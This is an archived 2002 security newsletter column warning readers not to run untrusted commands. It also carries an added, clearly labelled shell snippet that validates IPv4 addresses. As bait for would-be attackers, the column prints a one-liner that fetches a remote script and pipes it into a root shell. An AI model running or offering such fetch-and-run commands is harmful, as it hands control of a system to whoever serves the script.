+------------------------------------------------------------------+
| Linux Security: Tips, Tricks, and Hackery                        |
| Published by Onsight, Inc.                                       |
|                                                                  |
| 22-October-2002                                                  |
| http://www.hackinglinuxexposed.com/articles/20021022.html        |
+------------------------------------------------------------------+

This issue sponsored by: Hacking Linux Exposed

Learn how to think like an attacker in order to secure your Linux network. In the ever-changing world of global data communications, inexpensive Internet connections, and fast-paced software development, security is constantly being compromised. Linux has always been considered the digital playground for crackers. Many hacks, exploits, and network security tools are written on Linux because it's readily available. Hacking Linux Exposed: Linux Security Secrets & Solutions shows you, step-by-step, how to defend against the latest Linux attacks by understanding the hacker's methods and sinister thought processes.

For more information, visit http://www.hackinglinuxexposed.com/

--------------------------------------------------------------------

Vet the code or pay the price
By Brian Hatch

Summary: Too many people blindly execute commands from anonymous strangers without checking to see what lies hidden, and leave themselves open to malicious attacks.

The Internet and its myriad mailing lists can offer a wealth of help and assistance when you have problems. When asking what obscure OpenSSL command you need to convert your X509 certificate from .cer to .pem format, you'll likely get an answer[1] from someone you've never met. When trying to fix your Apache configuration to block access to all .htaccess files, someone will provide a snippet[2] of configuration that can help you out.

Unfortunately, many people blindly copy and paste the suggestions without analysing what they're given. In the best case the commands simply won't do what you expected, and may leave you believing you'd fixed your problem.
In the worst case, you may have been given a trojan that will break the security of your own system and hand it to the cracker. This sort of trick is common on security lists, where someone posts 'exploit code' to test your software that actually binds a root shell or deletes your files.

Although most folks claim never to trust code from unknown sources, I can still tell that this happens every day. For example, two weeks ago in this column I showed you how you could create a simple but effective firewall in 10 minutes[3]. The column included a shell script you could run with minimal changes. The top of the script read as follows:

    # Definitions
    EXT_INTERFACE=eth1
    EXT_IP=300.3.3.3
    INT_INTERFACE=eth0
    INT_IP=192.168.1.1

The IP address I used was 300.3.3.3. Anyone who has played with IP much will see that this doesn't make sense: each octet of a valid IPv4 address ranges from 0 to 255.[4] By choosing 300, I guaranteed that this script would blow up if anyone tried to run it unaltered.

And run it they did. I received five emails from folks telling me that the code didn't work, and that they got errors because of the invalid IP address.[5] I get this type of complaint frequently.

(The other kind of mail I get frequently contains little more than 'I need a program that will let me break into my friend's computer. Send it to me now!'. I get this so much that I thought I'd help out by providing the following, which must, sadly, be run as root:

    lynx --source http://www.hackinglinuxexposed.com/auto-hack-script.f?IP | sh

You must replace 'IP' with the IP or hostname you'd like to attack.)

Hopefully I don't need to explain any further why you shouldn't blindly run code from others. Next week I'll explain the methods I use when writing examples to help keep others from accidentally running my commands as-is.
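As an added example (this is not part of Brian's column or of the firewall script it refers to), here is a POSIX sh check that such a script could run before its first iptables call. It validates that every address in the Definitions block is a dotted quad with each octet in 0..255, so a copy-and-pasted value like 300.3.3.3 is rejected with a clear message instead of failing somewhere inside a rule. The function names valid_ipv4 and check_definitions are this example's own; EXT_IP and INT_IP are the variable names from the column, and the Definitions block is reproduced as it appeared there.

```shell
#!/bin/sh
# Added example, not from the original column: sanity-check the
# "Definitions" block of a firewall script before any iptables call.
# Function names (valid_ipv4, check_definitions) are this example's own;
# EXT_IP / INT_IP are the variable names used in the column.

# valid_ipv4 ADDR: return 0 if ADDR is a dotted quad with every octet
# in 0..255, 1 otherwise.  Plain POSIX sh; the only external tool is tr.
valid_ipv4() {
    addr=$1
    # Reject an empty string, anything other than digits and dots,
    # and any empty octet (leading, trailing or doubled dot).
    case "$addr" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    # Split on dots into the function's positional parameters.
    set -- $(printf '%s' "$addr" | tr '.' ' ')
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        # Cap the length first so a value like 1000 never reaches
        # the numeric comparison.
        [ ${#octet} -le 3 ] || return 1
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# check_definitions: validate the addresses from the Definitions block.
# Prints one line per problem on stderr and returns the number of
# problems found (0 = all good), so a script can simply write:
#     check_definitions || exit 1
check_definitions() {
    bad=0
    for pair in "EXT_IP=$EXT_IP" "INT_IP=$INT_IP"; do
        name=${pair%%=*}
        val=${pair#*=}
        if ! valid_ipv4 "$val"; then
            printf '%s=%s is not a valid IPv4 address\n' "$name" "$val" >&2
            bad=$((bad + 1))
        fi
    done
    return $bad
}

# Definitions exactly as they appeared in the column, including the
# deliberately impossible external address.
EXT_INTERFACE=eth1
EXT_IP=300.3.3.3
INT_INTERFACE=eth0
INT_IP=192.168.1.1

# Run the check.  An unaltered copy of the column's script stops here
# with "EXT_IP=300.3.3.3 is not a valid IPv4 address" instead of
# handing a nonsense address to iptables.
if check_definitions; then
    echo "definitions look sane, continuing to build rules"
else
    echo "refusing to build firewall rules until the definitions are fixed" >&2
fi
```

The check is deliberately strict about shape rather than meaning: it does not know whether 192.168.1.1 is really your internal address, only that it could be one. That is the same division of labour the column asks of you: the script can catch the obviously broken values, but only you can read the rest of it and decide whether it does what the sender claims.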
NOTES:

[1] openssl x509 -in file.cer -inform DER -out file.pem

[2] You'd use:

        <Files ~ "^\.ht">
            Order allow,deny
            Deny from all
        </Files>

[3] http://www.hackinglinuxexposed.com/articles/20021008.html

[4] Of course the values 0 and 255 are not available in some cases. The first and last IP addresses in your range are reserved for the network address and the broadcast address, respectively. Some routers still do not let you use 0 or 255 as an octet, even when the netmask makes it clear it is not a network or broadcast address.

[5] *Hobbit* went so far as to refer to this article as '10 minute error fodder' because of the illegal IP used throughout.

-------------

Brian Hatch is Chief Hacker at Onsight, Inc and author of Hacking Linux Exposed and Building Linux VPNs. He doesn't trust code that anyone sends him, and certainly nothing he provides to himself. Brian can be reached at brianat_private

--------------------------------------------------------------------

This newsletter is distributed by Onsight, Inc.

The list is managed with MailMan (http://www.list.org). You can subscribe, unsubscribe, or change your password by visiting http://lists.onsight.com/ or by sending email to linux_security-requestat_private

Archives of this and previous newsletters are available at http://www.hackinglinuxexposed.com/articles/

--------------------------------------------------------------------

Copyright 2002, Brian Hatch.

-
ISN is currently hosted by Attrition.org

To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail.
This archive was generated by hypermail 2b30 : Wed Oct 23 2002 - 01:43:37 PDT